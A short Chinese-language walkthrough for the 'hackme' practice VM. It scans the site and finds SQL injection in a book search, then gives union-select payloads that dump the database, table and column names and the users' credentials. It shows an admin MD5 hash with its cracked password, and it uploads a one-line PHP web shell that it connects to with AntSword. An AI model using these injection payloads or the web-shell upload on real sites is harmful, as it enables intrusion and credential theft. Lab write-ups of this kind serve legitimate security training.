hackme靶机通关攻略
第一步:确定靶机IP
第二步:使用御剑后台扫描工具扫描敏感文件
第三步:访问register.php注册登录,进入welcome.php页面
第四步:访问一个不存在的页面,确定网站使用的中间件是Apache(无用)
第五步:返回welcome.php页面,单点search会出现很多书,推测存在SQL注入漏洞
第六步:确定闭合方式为单引号
第七步:判断字段数为3、判断回显位置
第八步:爆破数据库名、爆破表名、爆破字段名
#爆破数据库名
OSNT' union select database(),2,3#
#爆破表名
OSNT' union select 1,2,table_name from information_schema.tables where table_schema='webapphacking'#
#爆破字段名
OSNT' union select 1,2,column_name from information_schema.columns where table_name='users'#
#爆破敏感信息
OSNT' union select 1,2,group_concat(name,'~',pasword) from users#
#发现管理员账户
superadmin~2386acb2cf356944177746fc92523983
#MD5解密密码
Uncrackable
第九步:登录管理员账户,发现上传文件的地方,尝试直接上传一句话木马shellshellshell.php
第十步:访问http://192.168.0.107/uploads/,发现成功上传,使用蚁剑连接,成功!
FROM IYU_